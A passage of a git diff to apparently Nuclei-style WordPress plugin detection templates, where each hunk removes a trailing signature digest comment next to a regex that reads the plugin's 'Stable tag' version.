b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022036a4a6c037857cae8cc4099fdd1ef2671726acd26bec8b57d427102ecd50b3b80220395fa3c535da59ceb770a6b9c912495da198b85387d1a39061057ba0a522ea64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 293a1f68dc..7b0593dcb7 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008bc7e59a0d17e2f2a48746005dcc504a0a387e9ff70b9d5930ef0851c660c7be022014699f47773613ae4135e7cd0851851d376dd31d2fa3477804c0acfbc0f34673:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index d911945054..6f65d087e4 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c6f903d18f23c923ee2e6d63f02e5340016973cd93fe0c0ff6605b2e103cc7c302203d90075a400d47696e42d3dc4037668d9b70860b6d59e894e8cfbf5861b5edac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 0eba2bdb34..783cdd283d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a5e5e281d843d8fb0524310490673f502feb4d02641ec35ece0e0bb9b2394c05022100a577aef2495197b990ccadc359d5fd9fb2f55b02a8df30aac95942d259798b69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 52d9cf199f..05121854b3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e4466787a38573bdb5eb747940059b4d2e6d8db618461e07800c500a7face59c02210084469416612d9d759b956bd5e7a5d82cf569ffd9e2e83ad2af800cb753824a2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 3b075d4b02..72f52edcd4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206b9b251a160c749b83bc33b930ee9b3d1a05171c478e24abc7ff661295d65727022100e305a7138110a4bf1ff45707b7980cbe001f8a49b2b12d11a9fdad19e9dc588a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 851d49bdd1..4cf45ebd74 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210087e3e77cfb97da2649501617848b36cd660b581712af974c7671b55700c78883022100a2f270caf207fd5b643d46157e7ace439c1179fca24672989b9424d013362c8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 5718647a44..3d6863e074 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022003256e20dae8774073a999145ac5931130a764ac537cc86479a99081e37c89ec022100f6ffc8193d2ddd4ba661de8c8f74f3d02ec6db50788a00ff7ae257d0653941b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 1feee9f67a..79e2813c5e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c6729d3f0c61b2c0e1b00fc9f29948183f66d3b3fa127e0470ca097df298122c022100fa7f4c566c25805af89086244cea9de3a2538a9681617aaab7460d3a18233802:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index 4fdf056328..ab9a0f1ae3 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ce4f26e856522f7e1bf4ae09a04f1f892cfa8d18d91d7ea2ba5a0e9e73d5357702210093487abd1e08939e36076e0a48cd57b26790aebb42f11c94108ed200c3df88e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index dd9f276d9b..5d3adf7c27 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d73b7dd0c59e8220c12e450c282d4fd17d27a2753839d8953ffb547451d918810220473d8aff68773f7f353aecb0eb01fc4acce1ce5c77dbc42f812ddc2fac590be1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index d84b845868..eda1d27f04 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fbcfe241a8c77ee53ced16b75011970ff3b1d4561c0d5f785a82e25f582b378b02203e6db9d97c9f875aa0f1b15a911fabcfbcb6cfe9787c7a12e0072282cf8a0baf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 93a0ec2d21..16dfc8df5f 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100937074a0676d4cd19ef7115c144d40356f2158bfe8e0c14c0240a825f1c19e52022024040275e59f57d70d0bb634ba78a30b973117891b3224418022627382fb5e27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9501baf3b4..4b7600ea69 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204b8070d2aa260dbc33875bf214295d8d5ee1fad6376d7e77f179dc96559768c302210095303107af7ca41635ed4542740375a90140025855dcfd31184239e98d7c339b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index a323e7b18c..2ccd4dbce8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b32a5e0427fdad2aad54d092967a571ecb57ee9764ec94f2be6030489af2e782022100a8cf71556958f22ea3980156e79300771287247450c1cb0458ba06d7fe432e42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 9231a5f4f6..02ceb224d1 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a004830460221008c8a33a2252b0aa6e5dff66ecda3c8f2bc1fd3ac19a5923e1d6270a5e6d12f14022100a155de8d9b35d03ea4f564a1840e0ee5dcbbef1304b525be7a6fc207561e0ea5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index aa5d25c053..367d587ce2 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200114533d1bca1efe687716d8166c753f143781b9b5a913990161baa1a4e72485022100c5b613db35140eb464a6b3cacdd12d2acfadb163571feb4595baa775937fcb4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 1586aaf8ed..feed730ee0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009646ef0e2fb2ef019944fa0b80be46ba2b33a68a409c42b6fd09853ff398ede40220164f83ad5c3c3d7fddfd7a55e067cc6b80f24a1ab7e6507c190aa784b14711f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 4cc8104fd7..9b2841e7ca 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b97b761424ee0aace93fee89d463e309bd6984c1893058c3a2c5e6c9f81fd5450220435a15a9f50c2fb718b6a929fbae94601bf130d8cad42940386a2c3e77aab502:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 64eb36969e..42be14c5df 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207e8368b39667ca329e810c329a3868400d67264199549929cc32d8f39727f65202202221c6f756447376d6d78be472bdeb961487d32d3abcd504bdf62df167dc485f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 962cdc6b1d..4e0cd86c3f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200f3bbcb8182ff06b1598f8cbe1a94d3a7d8ce53cb4cd8345e2726be5b04f056b0220337fa42c2966253157a6cf39f51750d49efaf5b8bbef9be3d1b9860dad70dafa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 61aa6e7c31..59eadc5e6e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201663a76dcbbc33401f6b49c4bbd24bdce186fffe13656334f0b958e755b0d384022100b4ae7a6310563b6006708368509c7db0495fb566f8ff023b9c59b9811b16cf41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index df9466ab71..41f7a0075e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a1f138f5e9c01a0a242a5ddd7649656ef33c5f09f876eaa48218bdc2b761df950221008e712275256fe907072dc2744f0464a775367f71c7e784e28ab47c21c6e2797d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ddc2eb5c0c..7e35a3fb4f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206e4b23fdb54e0fafff73e6fdaf93eb263bf10268fe088dd8b93f343ab8f6950b02202814aedfd42a21fde29a86986afd2882314ee5f94d027bc007bed195bcd33705:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 3283c2f515..18c2a7586e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e7aeb13908dc27242a69d0e3c34d0142988153705f0eeb7b7145c6741f41d24d0220034db17c3dd0a259d1cfef2afd2f7bcb1e5304c0dc883eb3fd88663aefd3b0b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 072cea28b9..6bc2aa78f9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201c8cf9c3869642344fa8647ddd90c1cda6518d59f6e56e81d8d24f444f1985400221009df74bc65d1c242bb05f476191767ec174565a1d227b96d7ba2ff027db1234b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 4696355623..a43d3352a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204885b6f0970c5759536e8096b7c4c59cba7d59b12035fa5990745d567a835021022047977e87324ea38aba9069fcce025f541bab1225bb16524ea19fc9eae1419184:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index acf0f4b209..e7db9944e4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210089027850189f60dc67208d9c1702546fc48eb2219dbaf5e13c32322843b9579f022075835929c5fcb85b1acc893c12aa4e876ff15df639247c36eeb0eea07daee87c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index ff139a1a6d..268bd7b9df 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220206641482d7e25f32de7dfbbc7daf2ffbd8d463531b9a9862ecf9c8cc38d611f02202b1488922e4049d9a8859ce2be630a5307f8de96109f2758d9d0469fb7ea9b88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index c8ab88d297..d7fb2209d1 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022057bb453d005dab6da21fe96f1f1f42277249ecc5d815b9f10af01a54959d7656022100fc5ae83acd470b66de63b24caad40f116c6de5a329a83c69f8517b462822725a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 3792b5079f..a1641d4632 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207237b40f025e6393b500bfc8c14c7224f93da7a2e35bef7484050a3509154dee022053d89b5f0cff1f7ccc5647b9b4a51071b8389788c4da77d615bd371b68eaa8d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index b35b1fa66b..3b6542683c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009ff773836e49a54cfa7c469a4cf829bf8411397ba321d697fc01d923ccec250a02207df9c23140a0bbe44f4574839f0083191cf3ad389e684caf13d71a5be8b98833:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 6680ecb50d..969c280ee1 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200eefca9b7e78c1f9eecc6bf3bf5b0efce9f4aa99fa94b4b957e208d54e19ec5c022100a9dbeb13454e81a6dd75fe49fa90b9a0b186b5dc0b7abb2a3726731e969095bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index b6028d499a..1c97c422e4 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e9c2b419732d6e611600887f9e2e36e3104d485a7d9bef68a3fa8f5a748c61c702203168566ea43a1da356fbbbd111502cf3bc5ffba0196b601ab9f01f93aa831bc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 8c4277172b..7d861cf06a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b3c0fa218de83618a16d576b616e27bb87ada4b0ede277397d8e76b1f4a9f0ec022100f9671ab3c4d10c39cb0e5ee7727bfb8c439ccc5dba557e2c42b239b962128bd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index a378383eea..00eb1e2dfc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b55f8d3ef89cc34df4445c2646cd98619c921e5fd602a3ebc60ae86791b637c90220707c14d1010e5014c09c5efbdd86ea33de8ac2c8b83aa98d9e9c59e9df03f2f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index 6768a836f4..f089ee37d3 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d478e8abeac931ff8d8aac2db05bfa16196d03533932bcc1a6bb5b130787687f02210083b1b32fc7e606634d1223b91b532e0dedd2ea97c3d0cb2b528240341a49e5b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index e210732a28..492d66db68 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220110371016162f736c3ead8d489b010f5f335b39a834dbc7d6a72d6395264537e022100fece6a19fe10e8dc1e60f539cb24fd64e1f1427d9197b6ebaff0686a812d6993:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 6c76461eef..f8903fa3db 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d8e2b1bb384af255a297c31bcfc462ac009d1850ed83870bbde69a94e5b0098e022023fb79e900c90b340a865b275dd50c38ef76404648af291e4a4f866ee71c116d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index bb24640dc6..ae2451ca38 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d81b7849d4e0d62dd837720b254cd0d90dcb1cb43cdb3e23c5e71400be7c6c4b022100e9437215658a93e2fa983e39da5e31a11327c6e0a404c535ab73d1e49d7c5ae3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index d3086d9dca..dcc61d1255 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201e26b186435714198cfb17f4c7bae8ba8987d3d1d6967dd688cbcc17c8f716f6022015681d01dcebd5a3ffd14e609ff2993e1e1ce2b68cf26f62784f274bd4c47068:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 50ea6b31d8..d1d2c1c1d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022029230972098684499d814aa50497456a24f4febdac1be45b4628cc78048091d6022100bed2e83c4e515013edb99168530de25e7bef0e7ad7c1d32d20a5c0b15fe5aa74:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 6006f9da3a..5f5e8afed5 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204c31e667cac393c3d579df893919216828210e97a9b70a6fa28b40167385d457022100f738c5fbbf4044d682315c60906e3edf4f64bdb557984d5ad426e64410782048:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index df33e14c2e..d15634bb2b 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100fda60a0e1400d9921159c06ae2e13a7881dd278e13919cfd76fbb766b9210b32022100a5d057a5ea36ac71720504762825473420a353081ff89a796c34a0d155eb1ca2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 38d86a1b6d..7da04be5d3 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200ece28ec69ace44c0311e2fb04325572ed5f7e5bbd4e8bdb7cef9acfcbe2c72002207c0f9002645e0825c51dec5008f8dad31c1327ba8154219941b207d85bf0a353:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6ef8678158..a79253cec5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210090ad05069515a4033e315b4dd22ea725232335ad192400301847ae495099e8140220193bae1e52fd3490193f3b0d0e773c182289351c25184bdf12ab14111fbd423e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 24b2560a8b..77fc04a220 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402204c2c786bcb5b7ede7be9811fd9e55cf2e3877c782274a10f328e2913d4af1a3e022002bf5147f3498062f3a02439d9c66ffdfd90261648e216407c1f27cad7e7dbb5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 606fb5dcba..733f9ee453 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502207f16a75b40c332774b9dc27b9c1f09a8a5c07f03d60680179af4b8324f1eff3802210094af2f228126adf4682359d4ed9caaedb641a767ce533ba35e83044c704dd147:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 